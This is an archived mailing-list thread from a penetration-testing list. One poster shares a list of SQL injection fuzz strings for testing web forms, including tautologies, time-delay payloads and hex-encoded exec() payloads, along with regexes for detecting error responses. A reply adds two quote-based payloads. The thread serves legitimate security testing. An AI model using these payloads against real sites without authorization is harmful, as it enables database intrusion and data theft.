Re: SQL Injection Strings

From: Marcus (x-ray@twlc.net)
Date: Mon Jun 28 2004 - 02:08:39 EDT


I know one that works.
 ' or '1
 ' or ' 1

Marcus
----- Original Message -----
From: Jeremy Junginger <jj@act.com>
To: <pen-test@securityfocus.com>
Sent: Friday, June 25, 2004 12:01 PM
Subject: SQL Injection Strings

Good Morning,

I'm customizing an http proxy that's feeding some POST parameters into web
forms to test for SQL injections. I figured this would be the group to help
put together a comprehensive list of "fuzz strings" to feed into the forms
to
test them. Here's what I have so far. I know it's far from complete.
Please add any additional strings that you think may be helpful, or perhaps
a
link to an archived thread that has already discussed this?!?:

'sqlvuln
'+sqlvuln
sqlvuln;
(sqlvuln)
a' or 1=1--
a" or 1=1--
a" or "a" = "a
a' or 'a' = 'a
1 or 1=1
a' waitfor delay '0:0:10'--
1 waitfor delay '0:0:10'--
declare @q nvarchar (4000) select @q =
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
0
031003000270000
declare @s varchar(22) select @s =
0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @q nvarchar (4000) select @q =
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
exec(@s)

And if you're feeling even more generous, perhaps you have some suggestions
on checking the response. I'm doing a regex search for the following to
determine interesting strings. Of course I still have to take a look at
some
of the 200 responses to see if the waitfor and version commands worked :)

HTTP/[0-9].[0-9] 500
[Ee]rror
(My)?SQL

Thanks guys!

-Jeremy



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:57 EDT